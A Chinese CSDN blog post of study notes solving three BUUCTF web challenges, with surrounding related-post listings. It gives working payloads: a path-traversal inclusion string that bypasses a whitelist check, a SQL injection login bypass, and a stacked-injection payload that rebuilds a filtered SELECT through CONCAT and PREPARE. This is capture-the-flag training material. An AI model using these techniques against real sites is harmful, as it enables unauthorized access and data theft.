学习笔记(buuctf web)

最新推荐文章于 2023-07-11 18:45:47 发布
最新推荐文章于 2023-07-11 18:45:47 发布
阅读量161 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51301115/article/details/116564513
版权

[HCTF 2018]WarmUp
打开后只有一个无法查看的图片,然后查看源码,查看source.php文件
先看代码主体,! empty保证传入的file非空,再用is_string()函数检测file是否为字符串,然后调用emmm类checkFile
再看emmm类,whitelist创建了一个白名单列表,其中有sourceh和hint,isset()和is_string()函数再次检测file是否为空和字符串,mb_strpos查找?出现的位置,并只取其前面的字符串,再次检测白名单。urldecde()函数对变量进行url解码,又再次过滤问号,再进行一次白名单检测
寻找emmm类中返回值为真的位置进行构造,使if中的三个条件均为真,执行Include
先打开hint.php得到提示,flag not here, and flag in ffffllllaaaagggg
file先经过一次一次白名单检测,在经过一个?字符的截断,再经过白名单检测时,通过检测,返回true,主函数中if的三个条件全真,highlight_file(file)

payload:source.php?file=hint.php?../../../../../../../../../ffffllllaaaagggg

多用几个…/保证ffffllllaaaagggg存在目录下

[极客大挑战 2019]EasySQL
username=1’
password=1’
回显中多了一个’
username=1’or’1’=‘1
password=1’or’1’='1
得到flag

[强网杯 2019]随便注
order by 3时报错
union select database(),2;# 回显存在过滤

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

于是采用堆叠注入
show databases;#
show tables;#

show columns from `1919810931114514`;#

查到列名flag

?inject=-1';SET @sql = CONCAT('sel','ect',' * from `1919810931114514`;');PREPARE dawn from @sql;EXECUTE dawn;#

因为select被过滤
使用concat拼接进行预编译
大写set与prepare

哈哈哈我头呢
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
buu ctf总结
Lelouch_E的博客
11-03 751
buuctf总结NiZhuanSiWei NiZhuanSiWei 主页是一段php代码,审计: 有file_get_content(),可以利用伪协议写入‘welcome to the zjctf
BUUCTF web(一)
Lemon's blog
10-16 1万+
前言:最近参加了一场CTF比赛,菜的一批,接下来多练习web题、MISC、密码学,多思考,提高一下自己做题的思路,以及代码审计、编写脚本的能力。 [HCTF 2018]WarmUp 查看源码,发现<!--source.php-->,打开发现源码 <?php highlight_file(__FILE__); if (! empty($_REQUEST['file...
BUUCTF Brute 1使用BurpSuite爆破详解
bill_fang的博客
08-28 1万+
最近研究一下白帽子安全,主要关注WEB安全,在做完了常规的靶场xsslab、SQLI、DVWA、Pikachu后,了解了白帽子安全的基础知识。进一步开始用一些CTF来练习。本文是从BUUCTF网站上,去解一个WEB的Flag的详细记录。0x00打开BUUCTF,打开靶机BUUCTF的地址在这里:BUUCTF在线评测 (buuoj.cn),进入后选择Basic->BUU BRUTE1.选择B...
【CTF】buuctf web 详解(持续更新)
热门推荐
m0_52923241的博客
08-12 4万+
buuctf web[HCTF 2018]WarmUp[极客大挑战 2019]EasySQL[极客大挑战 2019]Havefun[强网杯 2019]随便注[ACTF2020 新生赛]Include[SUCTF 2019]EasySQL[极客大挑战 2019]Secret File[ACTF2020 新生赛]Exec[极客大挑战 2019]LoveSQL[GXYCTF2019]Ping Ping Ping[极客大挑战 2019]Knife[极客大挑战 2019]Http[RoarCTF 2019]Easy
学习笔记(ctfshow WEB
qq_51301115的博客
05-02 198
web签到题 查看源码 将源码中的字符串使用base64解码 得到flag
BUUCTF笔记Web系列部分WriteUp(三)
克格莫(有需要的私信)
05-22 6091
1、[CISCN2019 华北赛区 Day2 Web1]Hack World 最近多做做sql注入,感觉自己在这一块还是很菜,进去就给了提示flag在flag表的flag字段
BUUCTF——Web
2201_75331136的博客
07-11 980
启动靶机,出现这个用户登录页面 随便输入一个用户名和密码,通过网址可以判断出该请求方式使用万能密码测试是否存在SQL注入漏洞登录后便可查看到flagflag为:启动靶机,出现以下页面 查看源代码尝试在网址后面加上?cat=dog出现以下存在flag的页面flag为:启动靶机,出现以下页面查看源代码source.php 应该是后端的源码,这题代码审计了 源码中 给出了 两个文件,还有一个 hint.php,这里给出了flag的位置 得到flagflag为:启动靶机,出现以下界面点击tips跳转到flag.ph
Web安全学习笔记PDF
01-31
Web 安全学习笔记 PDF 本资源摘要信息将对 Web 安全学习笔记 PDF 进行详细的知识点总结。该笔记涵盖了 Web 安全领域的多个方面,包括网络技术演化、网络攻防技术演化、网络安全观、法律与法规、计算机网络与协议、...
安全:Web安全学习笔记
02-26
这个月看了一本《Web安全设计之道》,书中的内容多是从微软官方文档翻译而来,这本书的含金量不高,不过也不能说没有收获,本文简单记录一下我学习Web安全方面的笔记。本文不涉及IIS、Windows和SqlServer的安全管理...
java web学习笔记
06-11
请别下载请别下载请别下载请别下载请别下载
java学习笔记总结
04-02
这份“java学习笔记总结”涵盖了作者在深入学习Java过程中积累的知识点和实践经验,旨在帮助读者理解和掌握Java的核心概念。 首先,Java的基础部分包括语法、变量、数据类型、运算符和流程控制。Java支持八种基本...
知乎小白关于ctf竞赛训练 积累的资料
syh_486_007的专栏
09-04 3万+
一个巧合的机会,成为了CTF夺旗爱好者,一个ctf小白。从12年开始国内大大小小的CTF比赛我都看过,那会还没有统一叫CTF,都是叫 网络攻防赛、信息安全赛之类的,目的就是为了通过技术手段找到最终的key(现在的CTF中叫做flag)。只是到了后来慢慢的可能受到DEFCON CTF的影响国内所有的安全竞赛也统一叫做CTF竞赛了。 国内外比较知名的比赛:XCTF联赛、DEFCON CTF、首都网络
小白学CTF之BUUCTF
逆旅行人的博客
07-14 395
easyre 非常简单的逆向 目录easyre 非常简单的逆向在这里插入图片描述1、下载文件,发现是一个exe文件2、入口区段显示txt,要不转成txt文件试一试。好家伙,还真能找到flag。搞定! 1、下载文件,发现是一个exe文件 不管三七二十一,扔进IDA里面运行一下。 2、入口区段显示txt,要不转成txt文件试一试。 好家伙,还真能找到flag。搞定! flag{this_Is_a_EaSyRe} ...
BUUCTF web笔记
qq_51637038的博客
08-31 386
Include 点击tips出现 根据题目名称include1猜测是文件包含漏洞 文件包含漏洞常见的方法有: 1.利用include()等函数,通过构造上传特定文件路径,绕过网站对参数的绕过,进入include函数,即可得到所需函数的源码,本题显然没有与include函数相关的线索 2.php伪协议 ①php://input,php://input即获得未经过解析的post参数,此时即可通过构造相应的php文件代码,如一句话木马或system函数查询等方式 发现网站对php:/..
BUUCTF】第五天
weixin_45892681的博客
10-16 95
1.镜子里面的世界 根据提示用stegsolve直接查看图片 然后发现在red=0 blue=0 green=0是有一些微小的字出现于是用data extract查看得到flag 2.被嗅探的流量 解压为pacp文件于是用wireshark搜素字符串flag找到他所在的数据包 然后得到flag 3.小明的保险箱 由题目知他要破解一个四位数密码的压缩包 但是下载下来的文件为一个图片于是用binwalk查看发现里面有一个压缩包 将压缩包分离 得到一个rar的压缩文件 用archpar破解得到密码得
聚类算法-一种无监督学习方法.docx
最新发布
08-12
聚类算法是一种无监督学习方法,用于将数据集中的数据点自动分组到不同的类别中,这些类别也称为“簇”或“群”。聚类的目标是让同一簇内的数据点尽可能相似,而不同簇之间的数据点尽可能不相似。聚类算法广泛应用于多种领域,如数据挖掘、模式识别、图像分析、信息检索等。 聚类算法的基本概念 无监督学习:聚类算法不需要事先标记数据点的类别标签,而是根据数据本身的相似性来分组。 相似性度量:聚类算法依赖于某种相似性或距离度量来决定数据点之间的相似程度。常用的度量包括欧氏距离、曼哈顿距离等。 目标函数:大多数聚类算法都会尝试最小化某种目标函数,例如簇内的平方误差和(SSE)。 常见的聚类算法 K-Means K-Means 是一种原型聚类算法,它通过迭代地将数据点分配到最近的质心来形成簇,并重新计算每个簇的质心,直到质心不再显著变化为止。 在 Python 的 scikit-learn 库中,可以通过 KMeans 类实现 K-Means 聚类。 层次聚类 层次聚类构建一个树状图(称为树状图或 dendrogram),显示数据点是如何逐渐合并成簇的。 这种算法可以是凝聚型(自底向上)或分裂型(自顶向下)。
45ft集装箱模型3D图纸 STEP格式.zip
08-12
45ft集装箱模型3D图纸 STEP格式.zip
Spring Boot网吧管理系统.zip
08-12
该系统严格按照需求分析制作相关模块,并利用所学知识尽力完成,但是本人由于学识浅薄,无法真正做到让该程序可以投入市场使用,仅仅简单实现部分功能,希望日后还能改善。 本系统具有以下优点: 该系统具有较高的适用性,选用B/S结构,可以在绝大部分个人平台上使用该系统。 系统将用户权限进行划分,管理员,网管和会员都能看到及操作的信息不一样,三者具备不同的操作权限。 该系统操作界面简单明了,大部分人都可以正常使用。 但也存在以下问题需要改进: 运行时窗口不能被刷新,可以改进。 系统过于简单,显示的信息有限。。 不能添加多个管理员账号,如果可以则将利于发展网吧规模,便于网吧信息集中管理。 不能实时预约接待消息和网吧反馈建议,容易被忽视,不利于管理员服务客户。
微信小程序大作业 新闻小程序
08-12
微信小程序大作业 新闻小程序
Flask Web框架入门学习笔记
"Flask详细学习笔记,涵盖了HTTP通信、Web框架的概念以及Flask框架的介绍,适合初学者查阅和了解。" 在Web开发中,HTTP通信是客户端(如浏览器、应用程序)与服务器之间交互的基础。这个过程可以分为6个步骤:首先...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值